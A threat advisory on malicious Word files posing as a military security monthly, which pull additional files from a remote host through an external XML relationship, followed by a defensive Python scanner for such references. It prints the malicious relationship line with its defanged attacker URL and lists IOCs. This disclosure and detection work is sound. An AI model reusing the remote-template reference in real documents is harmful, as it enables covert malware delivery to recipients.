Distribution of Malicious Word Document Disguised as a Military Security Monthly Magazine (April 2021)

On March 29th, the ASEC analysis team introduced malicious Word documents containing North Korea-related materials. When such a file is opened, it connects to the 'External URL' written in its XML and downloads additional files.

The team recently found that malicious Word documents using the same method, disguised as a military security monthly magazine (April 2021), are currently being distributed. The file names are as follows:

  • MonthlyKIMA2021_AprilMilitarySecurity0330.docx
  • MonthlyKIMA2021_AprilMilitarySecurity0331.docx

The document file is protected; once the protection is removed, the following content is revealed.

Content disguised as a monthly magazine (1)
Content disguised as a monthly magazine (2)

The malicious external address the document connects to is as follows:

  • Target="hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6" TargetMode="External"/>
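A document can be checked for this kind of reference without opening it in Word. The following is an added example, not ASEC's code: it lists every relationship marked TargetMode="External" in a .docx package's .rels parts and marks those that are not plain hyperlinks. The sample package, its example.invalid URLs and the attachedTemplate relationship type are constructed assumptions; the page does not state which relationship type these documents use.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_PART = 1 << 20  # refuse oversized .rels parts (decompression bombs)


def external_relationships(docx_bytes):
    """Return (part, type, target, loads_on_open) per external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".rels"):
                continue
            if info.file_size > MAX_PART:
                findings.append((info.filename, "oversized-part", "", True))
                continue
            raw = zf.read(info)
            if b"<!DOCTYPE" in raw:  # OPC parts must not carry a DTD
                findings.append((info.filename, "dtd-present", "", True))
                continue
            for rel in ET.fromstring(raw).iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                # Hyperlinks are fetched only on click; any other external
                # type is treated here (assumption) as resolved on open.
                findings.append((info.filename, kind, rel.get("Target", ""),
                                 kind != "hyperlink"))
    return findings


def build_sample():
    """Constructed test package: one .rels part, no real document body."""
    rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
        'Target="http://example.invalid/tmp?q=6" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
        'Target="https://example.invalid/about" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()
```

Calling `external_relationships(open(path, "rb").read())` on a quarantined attachment gives the same tuples; rows whose last field is `True` are the ones to review first.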

As shown in the figure below, the legitimate documents are normally distributed in PDF format.

A normal document being distributed in PDF format

Recently, numerous malicious Word documents containing North Korea-related materials have been distributed. It is highly likely that they have been sent to people working in North Korea-related fields. Since social engineering attacks via email have increased substantially, users must remain vigilant to prevent damage from such attacks.

V3 products detect and block the files using the following aliases:

[File Detection]

  • Downloader/DOC.External (2021.04.03.00)

[IOC]

  • MonthlyKIMA2021_AprilMilitarySecurity0331.docx
  • MonthlyKIMA2021_AprilMilitarySecurity0330.docx
  • hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6
